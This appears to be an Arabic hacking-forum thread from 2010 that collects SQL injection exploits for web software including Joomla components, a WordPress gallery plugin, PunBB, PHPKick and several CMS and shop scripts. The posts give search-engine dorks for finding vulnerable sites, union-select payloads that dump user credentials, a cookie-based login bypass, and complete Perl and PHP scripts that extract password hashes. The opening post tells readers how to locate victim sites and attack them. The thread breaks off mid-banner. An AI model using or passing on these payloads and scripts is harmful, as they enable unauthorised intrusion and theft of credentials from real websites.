√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

Master vbspiders · 5 أغسطس 2010

[align=center]الـسـلام عـلـيكـم[/align]

::مملكة ثغرات حقن قواعد البيانات::
::متجدد بأذن الله::
-------------------------

البعض ما بيعرف يستغل الثغرات في مواقع السكيورتي المشهورة وممكن ما يستفيد منها اذا طرحتها هنا...
مع انو بيعرف يحقن لذلك اول ثغرة اقدمها راح اشرح عليها
نبدا على بركة الله

PHP:

Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection
#عنوان الثغرة وهو عادة يحتوي على اسم السكربت المصاب وايضا على نوع الثغرة#
2010-08-05
--تاريخ صدور الثغرة--

$الان هنا محتوى الثغرة$
####################################################################
.:. --اسم او لقب كاتب الثغرة--Author : Metropolis
.:. Home : www.metropolis.fr.cr --موقع الكاتب--
.:. --السكربت المصاب-- Script : Nuked-Klan Module Partenaires NK 1.5
.:. Version : 1.5 --اصدار السكربت--

.:. Download Script: http://www.nuked-klan.org/index.php?file=Download&op=description&dl_id=317--هذا رابط تحميل السكربت وهو مش مهم الك--
.:. Bug Type : Blind Sql Injection--نوع الثغرة وهنا نوعها بلايند سكول--
.:. Dork : inurl:/modules/Partenaires/clic.php?id=
--الدورك وهو الي راح تعملو نسخ ولصق باي محرك بحث والنتائج الي راح تطلع هي المواقع الماصبة--
####################################################################
Blind Sql Injection

SQL Error =>
--كيفية ايجاد الخطا--

/modules/Partenaires/clic.php?id=8' 
--هذا الرابط الخاص بايجاد الخطا--

www.site.com/modules/Partenaires/clic.php?id=8 [Blind]
--وهذا الاستغلال..يعني الان مثلا طلع احد المواقع المصابة هذا مثلا :
www.xxx.com
وهو طبعا معاه السكربت راح تضع بعد الرابط مثل الاستغلال :
/modules/Partenaires/clic.php?id=
بعد اليساوي ضع قيمة حسب الي يطلعلك بمحرك البحث وهاكذا مع كل المواقع...

####################################################################

الان هذا احد الامثلة ومع الشرح اما الثغرات القادمة راح تكون بدون شرح...
رجاء ارجو ان يكون الموضوع خاص بوضع الثغرات فقط وبدون ردود
تحياتي
Master vbspiders

nabil987 · 5 أغسطس 2010

لم افهم

Master vbspiders · 5 أغسطس 2010

nabil987 قال:
لم افهم

[align=center]شو هو الي ما فهمتو اخي الكريم
هذا الموضوع هو عبارة عن اختصار في البحث عن السكربتت المصابة بثغرة السكول
وهنا انا اضع الثغرات الي فيها السكرببت المصابة والي راح تسهل عليك البحث عن المواقع الماصبة
هذا كل ما في الموضوع
وارجو عدم طرح ردود جانبية اخرى
هذا اخير تبليغ
تحياتي[/align]

Master vbspiders · 5 أغسطس 2010

APT-WEBSHOP-SYSTEM modules.php SQL injection

PHP:

===============================================
APT-WEBSHOP-SYSTEM modules.php SQL injection
===============================================
 
  ____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  / __// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 _\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               /___/                         
 
####################################################
# APT-WEBSHOP-SYSTEM modules.php SQL injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net
# Dork          : powered by apt-webservice ;apt-webshop-system v3.0
# Vendor        : http://www.apt-ebusiness.com
 
# Exploit       : [site]/shop/modules.php?warp=artikel&group=x&seite=x&id=xxx(SQLINJECTION)
 
 
#######################################################################################

Master vbspiders · 5 أغسطس 2010

Joomla CamelcityDB 2.2 SQL Injection Vulnerability

PHP:

view source
print?
==============================================================
Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
==============================================================
  
###########################
Title : Joomla Component (com_camelcitydb2) SQL Injection Vulnerability
Script : Joomla CamelcityDB 2.2
Date : 02/08/2010
Author : Amine_92
Tested : All version
Home : http://vbhacker.net
Dork : inurl:"option=com_camelcitydb2"
contact : amine92_16@hotmail.fr
########################### 
           
[ Vulnerable File ]
       
[path]/index.php?option=com_camelcitydb2&view=all&Itemid=15
  
[SQL]:
  
/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
  
############################################################## 
Thank's to : All Hacker Mu$lim & Poeple of Gaza

Master vbspiders · 5 أغسطس 2010

WordPress NextGEN Smooth Gallery Blind SQL Injection Vulnerability

PHP:

#############################################################################################################
## WordPress NextGEN Smooth Gallery BLIND SQL injection                                            ##
## Author : kaMtiEz (kamzcrew@yahoo.com)                                   ##
## Homepage : http://www.indonesiancoder.com                                           ##
## Date : 03 August, 2010                                                          ##
#############################################################################################################
 
[ Software Information ]
 
[+] Download : http://downloads.wordpress.org/plugin/nextgen-smooth-gallery.1.2.zip
[+] version : 1.2 or lower maybe also affected
[+] Vulnerability : BLIND SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
 
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=[VALID ID][BLIND-SQL]
 
[ DEMO ]
 
http://www.site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=31[BLIND-SQL]
 
http://www.site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=34[BLIND-SQL]
 
http://www.site.com/dp2009/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=2[BLIND-SQL]
 
[ FIX ]
 
dunno :">
 
 
#############################################################################################################
 
[ Thx TO ]
 
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock
 
 
[ NOTE ]
 
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] Menyambut kemerdekaan INDONESIA .. MERDEKA !!
[+] Selamat Menyambut datangnya bulan ramadhan :D
[+] sendiri di malam hari sambil merokok menikmati indahnya pagi ;)
 
[ QUOTE ]
 
[+] INDONESIANCODER still r0x
[+] nothing secure ..

darkman.dz · 5 أغسطس 2010

nabil987
أخي العزيز
الأخ أعلاه فقط شرح لك اللغة الإنجليزية
لايعقل أنك لا تفقه هاته اللغة و تريد التعلم أخي العزيز
لازم عليك تتعلم ولو بعض المبادئ منها
هاته نصيحة مني لك
--------------------------------------
Master vbspiders
مشكور على المباردة الحلوة و موضوع يستحق التثبيت و التقييم
أرجو تفاعل الجماعة

Master vbspiders · 5 أغسطس 2010

ooooo_darkman_ooooo قال:
nabil987
أخي العزيز
الأخ أعلاه فقط شرح لك اللغة الإنجليزية
لايعقل أنك لا تفقه هاته اللغة و تريد التعلم أخي العزيز
لازم عليك تتعلم ولو بعض المبادئ منها
هاته نصيحة مني لك
--------------------------------------
Master vbspiders
مشكور على المباردة الحلوة و موضوع يستحق التثبيت و التقييم
أرجو تفاعل الجماعة

[align=center]شكرا على التوضيح ولا مانع اذا الاخوة شاركوني بوضع الثغرات...
تحياتي[/align]

عبد الله ر · 5 أغسطس 2010

PHP:

TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
 Name              TTVideo Vendor            http://www.toughtomato.com Versions Affected 1.0
 Author            Salvatore Fresta aka Drosophila Website           http://www.salvatorefresta.net Contact           salvatorefresta [at] gmail [dot] com Date              2010-07-27
X. INDEX
 I.    ABOUT THE APPLICATION II.   DESCRIPTION III.  ANALYSIS IV.   SAMPLE CODE V.    FIX
I. ABOUT THE APPLICATION________________________
TTVideo  is  a  Joomla!  component that makes use of thepopular  video  sharing  site  Vimeo  to  create a videolibrary.
II. DESCRIPTION_______________
A  parameter  in  ttvideo.php  is not properly sanitisedbefore being used in a SQL query.
III. ANALYSIS_____________
Summary:
 A) SQL Injection
A) SQL Injection________________
The parameter cid passed to ttvideo.php when task is setto video  is not properly sanitised before being used ina SQL query.  This  can  be  exploited to manipulate SQLqueries by injecting arbitrary SQL code.  The  followingis the vulnerable code:
ttvideoController.php (line 40):
function video() {    $cid = JRequest::getVar('cid', null, 'default');
ttvideo.php (line 188):
function getVideo($id) {    $db = $this->getDBO();    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");    $video = $db->loadObject();     if ($video === null)      JError::raiseError(500, 'Video with ID: '.$id.' not found.');    return $video;}IV. SAMPLE CODE_______________
A) SQL Injection
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1  UNION SELECT  1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17  FROM jos_users
V. FIX______
Use JRequest::getInt instead of JRequest::getVar

عبد الله ر · 5 أغسطس 2010

PHP:

 -----------------------------------------------------------------------------------------Freeway 

CMS 1.4.3.210 SQL Injection Vulnerability-----------------------------------------------------------------------------------------  

[+]Title              Freeway CMS 1.4.3.210 SQL Injection  Vulnerability[+]Author          **RoAd_KiLlEr**[+]Contact         RoAd_KiLlEr[at]Khg-Crew[dot]Ws[+]Tested on     Win Xp Sp  2/3---------------------------------------------------------------------------[~]

 Founded by **RoAd_KiLlEr**[~] Team: Albanian Hacking Crew[~]

 Contact:  RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://inj3ct0r.com[~] Vendor:  http://www.openfreeway.org[~] 

Download:  http://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz[~]  Version:1.4.3.210[~]

 Price : Free==========ExPl0iT3d by  **RoAd_KiLlEr**==========[+]  

Description: Freeway is the most advanced  Open Source eCommerce  platform and includes an array of features not  found in extremely  expensive commercial systems. Without having to  purchase a commercial  system and then paying a developer to build  custom installation, Freeway  does most of what you need out of the box.  For example, instead of  getting dragged into purchasing an overpriced  products based system and  having a developer struggle for weeks and  eventually fail to force  products sales into event sales, Freeway  already support events AND  services AND  subscriptions.
========================================== [+]

 Dork: No  DoRks For Script Kiddies ========================================== [ I  ].

  SQL Vulnerability=+=+=+=+=+=+=+=+=+ [P0C]

  http://127.0.0.1/path/index.php?ecPath=[SQL Injection]

 [L!v3 D3m0]:  http://www.site.com/register/index.php?ecPath='3

 And we Got:  1054 -  Unknown column 'e.events_status' in 'where clause' select  events_id,  events_image from events where

 (e.events_status=1 or (   e.events_status=2 and e.sessions_start_date>=curdate()) or   (e.events_status>=3 and e.sessions_end_date>=curdate())) and   date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by   events_date_added desc limit 4 Now you will be doing the Rest :P. Good  Luck   ===========================================================================================[!]

 Albanian Hacking Crew            ===========================================================================================[!]

 **RoAd_KiLlEr**    ===========================================================================================[!] 

MaiL:  sukihack[at]gmail[dot]com===========================================================================================[!] 

  Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. |   The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All   Albanian/Kosova Hackers  ===========================================================================================[!]

 Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR |  All  Inj3ct0r 31337 Members | And All My  Friendz===========================================================================================[!]

 Red n'black i dress eagle on my chestIt's good to be an
 ALBANIANKeep my  head up high for that flag I dieIm proud to be an  ALBANIAN===========================================================================================

Master vbspiders · 5 أغسطس 2010

AV Arcade v3 ****** SQL Injection Authentication Bypass

PHP:

:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / ******                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:
 
[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login
 
[2] Apply these ******:
 
    Javascript:********.****** = "ava_username=admin;"
    Javascript:********.****** = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"
 
[3] Go to main Page:
 
[4] Enjoy

Master vbspiders · 5 أغسطس 2010

PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit

PHP:

#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
#   function pun_pm_edit_message()
#   {
#       global $forum_db, $forum_user, $lang_pun_pm;
#
#       $errors = array();
#
#       // Verify input data
#       $query = array(
#           'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#           'FROM'      => 'pun_pm_messages m',
#           'JOINS'     => array(
#               array(
#                   'LEFT JOIN'     => 'users AS u',
#                   'ON'            => '(u.id = m.receiver_id)'
#               ),
#           ),
#           'WHERE'     => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#       );
#
#       ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#       $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).
 
use strict;
use warnings;
 
use LWP::UserAgent;
use HTTP::******s;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
 
my ($UserName,$PassWord,$ID) = @ARGV;
if (@ARGV < 3) {
    &usage();
    exit();
}
 
my $Message = "";
my $Hash = "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(GET => $Host);
my $******s = new HTTP::******s;
my $HTTP = new LWP::UserAgent(
            agent => 'Mozilla/5.0',
            max_redirect => 0,
            ******_jar => $******s,
        ) or die $!;
my $Referrer = "http://www.warwolfz.org/";
my $DefaultTime = request($Referrer);
 
sub request {
    $Referrer = $_[0];
    $Method->referrer($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP->request($Method);
    $Response->is_success() or die "$Host : ", $Response->message,"\n";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}
 
sub Blind_SQL_Jnjection {
    my ($dec,$hex) = @_;
    return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
 
sub Clear() {
    my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
    return system($launch);
}
 
sub Login() {
    if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
        $******s->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!;
    }
    my $Get = $HTTP->get($Host.'login.php');
    my $csrf_token = "";
    if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
        $csrf_token = $1;
    }
    my $Login = $HTTP->post($Host.'login.php',
                [
                    form_sent       => '1',
                    redirect_url    => $Host.'login.php',
                    csrf_token      => $csrf_token,
                    req_username    => $UserName,
                    req_password    => $PassWord,
                    save_pass       => '1',
                    login => 'Login',
                ]) || die $!;
 
    if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
        return 1;
    } else {
        return 0;
    }
}
 
sub usage {
    Clear();
    {
        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                             *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " * perl name_exploit.pl [username] [password] [id]    *\n";
        print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
        print " ------------------------------------------------------ \n";
        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    exit;
}
 
sub ******* {
    Clear();
    {
        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " ------------------------------------------------------ \n";
        print " * USAGE:                                             *\n";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " * perl name_exploit.pl [username] [password] [id]    *\n";
        print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
        print " ------------------------------------------------------ \n";
        print " *         Powered By Dante90, WaRWolFz Crew          *\n";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
        print " ------------------------------------------------------ \n";
    };
    print $_[0] ."\n";
    print " * Victime Site: " . $_[1] . "\n";
    print " * Default Time: " . $_[2] . " seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
    print " * BruteForcing N Char Hash: " . $_[6] . "\n";
    print " * SQL Time: " . $_[5] . " seconds\n";
    print " * Hash: " . $_[4] . "\n";
}
 
sub Main(){
    if (Login() == 1) {
        $Message = " * Logged in as: ".$UserName;
    } elsif (Login() == 0) {
        $Message = " * Login Failed.";
        *******($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    for (my $I=1; $I<=40; $I++) { #N Hash characters
        for (my $J=0; $J<=15; $J++) { #0 -> F
            $Time_Start = time();
            my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
            $Time_End = time();
            $Time = request($Referrer);
            *******($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if ($Time_End - $Time_Start > 6) {
                $Time = request($Referrer);
                *******($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                if ($Time_End - $Time_Start > 6) {
                    syswrite(STDOUT,chr($chars[$J]));
                    $Hash .= chr($chars[$J]);
                    $Time = request($Referrer);
                    *******($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                    last;
                }
            }
        }
        if ($I == 1 && length $Hash < 1 && !$Hash) {
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        if ($I == 40) {
            print " * Exploit Successfully Executed                      *\n";
            print " ------------------------------------------------------\n ";
            system("pause");
        }
    }
}
 
Main();
 
#WaRWolFz Crew

Master vbspiders · 5 أغسطس 2010

Freeway CMS 1.4.3.210 SQL Injection Vulnerability

PHP:

-----------------------------------------------------------------------------------------
Freeway CMS 1.4.3.210 SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]Title              Freeway CMS 1.4.3.210 SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://inj3ct0r.com
[~] Vendor: http://www.openfreeway.org
[~] Download: http://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz
[~] Version:1.4.3.210
[~] Price : Free
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Description: Freeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systems. Without having to purchase a commercial system and then paying a developer to build custom installation, Freeway does most of what you need out of the box. For example, instead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event sales, Freeway already support events AND services AND subscriptions.
==========================================
 
[+] Dork: No DoRks For Script Kiddies
 
==========================================
 
[ I ].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[P0C]:  http://127.0.0.1/path/index.php?ecPath=[SQL Injection]
 
[L!v3 D3m0]: http://www.site.com/register/index.php?ecPath='3
 
And we Got:  1054 - Unknown column 'e.events_status' in 'where clause'
 
select events_id, events_image from events where (e.events_status=1 or ( e.events_status=2 and e.sessions_start_date>=curdate()) or (e.events_status>=3 and e.sessions_end_date>=curdate())) and date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by events_date_added desc limit 4
 
Now you will be doing the Rest :P. Good Luck
 
===========================================================================================
[!] Albanian Hacking Crew          
===========================================================================================
[!] **RoAd_KiLlEr**  
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | All  Inj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================

Master vbspiders · 6 أغسطس 2010

APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability

PHP:

#############################################################################################################
## APBoard 2.1.0  / board.php?id= SQL Injection                                           ##
## Author         : secret - mohammed.atta@hotmail.com                                   ##
## Homepage       : http://swissfaking.net/                                             ##
## Date           : 05 August, 2010                                                    ##
#############################################################################################################
  ____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  / __// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 _\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               /___/                          
   
####################################################
# APBoard 2.1.0  / board.php?id= SQL Injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net/
# Dork          : APBoard 2.1.0 © 2003-2010 APP - Another PHP Program
# Vendor        : http://www.php-programs.de/
# Version       : 2.1.0 and earlier
# Exploit       : http://www.yoursite.de/board/board.php?id=X[SQL INJECTION]
# Tested on     : Microsoft OS
   
e.g. http://server/board/board.php?id=6[get union columns&USERS'] (-sqlinjection)
    
########################################################################################
   
#note : IRAN owns - mohammed.atta@hotmail.com

Master vbspiders · 6 أغسطس 2010

sX-Shop Multiple SQL Injection Vulnerabilities

PHP:

########################################################################################
 
sX-Shop SQL Injection Vulnerabilities
 
########################################################################################
 
Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/
 
########################################################################################
  
Sql Injection :
 
http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)
 
########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################

Master vbspiders · 9 أغسطس 2010

PHPKick v0.8 statistics.php SQL Injection Exploit

PHP:

# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
  
<?php
    echo"\n\n";
    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo"|                                                                            |\n";
    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo"|                                                                            |\n";
    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
  
    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo"|      the owner of the webspace is illegal!                                 |\n";
    echo"|      I'm not responsible for any resulting damage                          |\n";
    echo"|                                                                            |\n";
    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo"|                                                                            |\n";
    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo"|============================================================================|\n\n\n";
  
  
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
    $host=$_SERVER['argv'][1];
    $path=$_SERVER['argv'][2];
    $spos=strpos($host, "http://");
    if(!is_int($spos)&&($spos==0)){
       $host="http://$host";
      }
    if(!$host=="http://localhost"){
       $spos=strpos($host, "http://www.");
       if (!is_int($spos)&&($spos==0)){
          $host="http://www.$host";
          }
      }
    $exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
    echo"exploiting...\n";
    $source=file_get_contents($host.$path.$exploit);
    $username=GetBetween($source," :<br>",":");
    echo "username: $username\n";
    $hash=GetBetween($source,"<br>$username:","</td>");
    echo"hash: $hash\n";
    }
else{
    echo"\n\n";
    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo"|                                                                            |\n";
    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
    echo"|                                                                            |\n";
    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
  
    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo"|      the owner of the webspace is illegal!                                 |\n";
    echo"|      I'm not responsible for any resulting damage                          |\n";
    echo"|                                                                            |\n";
    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
    echo"|                                                                            |\n";
    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
    echo"|============================================================================|\n";
}
function GetBetween($content,$start,$end){
    $r = explode($start, $content);
    if (isset($r[1])){
        $r = explode($end, $r[1]);
        return $r[0];
    }
    return '';
}

?>

Master vbspiders · 9 أغسطس 2010

Tycoon CMS Record Script SQL Injection Vulnerability

PHP:

% Tycoon(CMS) Record Script Sql vulnerability
 
-------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_
0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam
0       ++++++++++++++++++++++++++++++++++++++++++++++++++++
1                      A Placec Of 0days  
------------------------------------------------------------------------------
 
^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability
^Date       : 7/8/2010
^Vendor Site    : http://www.tycoon.co.kr
^MOD Version    : 1.0.9
^Author     : Silic0n (science_media017[At]yahoo.com)
^category:  : webapps/0day
^Dork       : inurl:index.php?mode=game_player
 
------------------------------------------------------------------------------
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,
 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,
 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .
 
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com
 
----------------------------------->Exploit<----------------------------------
 
0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version
 
Version : (4.0.22-log)
 
------------------------------------------------------------------------------

Master vbspiders · 9 أغسطس 2010

Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability

PHP:

view source
print?
     )   )            )                     (   (         (   (    (       )     )
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\
